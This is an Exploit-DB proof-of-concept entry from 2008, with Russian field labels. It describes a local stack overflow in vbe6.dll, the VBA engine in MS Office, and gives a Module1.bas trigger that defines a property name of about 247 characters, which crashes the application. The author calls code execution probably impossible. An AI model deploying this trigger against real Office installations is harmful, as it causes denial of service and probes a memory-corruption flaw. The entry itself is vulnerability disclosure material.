Exploit Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service

[Exploiter]

EDB-ID

5321

Проверка EDB

1. Пройдено

Автор

MARSU

Тип уязвимости

DOS

Платформа

WINDOWS

CVE

N/A

Дата публикации

2008-03-30

Stack overflow in vbe6.dll, (used by all versions of MS Office)
The overflow occurs in Visual Basic for Application. 
Creating a property with a long name ( about 247 chars) results in a stack overflow in vbe6.dll which overwrites with a null byte the first byte of the return address.

Probably impossible to exploit, but who knows? ^^ At least, there still exist stack overflows in Office apps :P

Marsu <[email protected]>

Module1.bas:

Attribute VB_Name = "Module1"

Public Property Get aaabcdefghissssssaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaasssssssssssssssssssssssssssssssssssssssssssssssssssade() As Variant
  
End Property

# milw0rm.com [2008-03-30]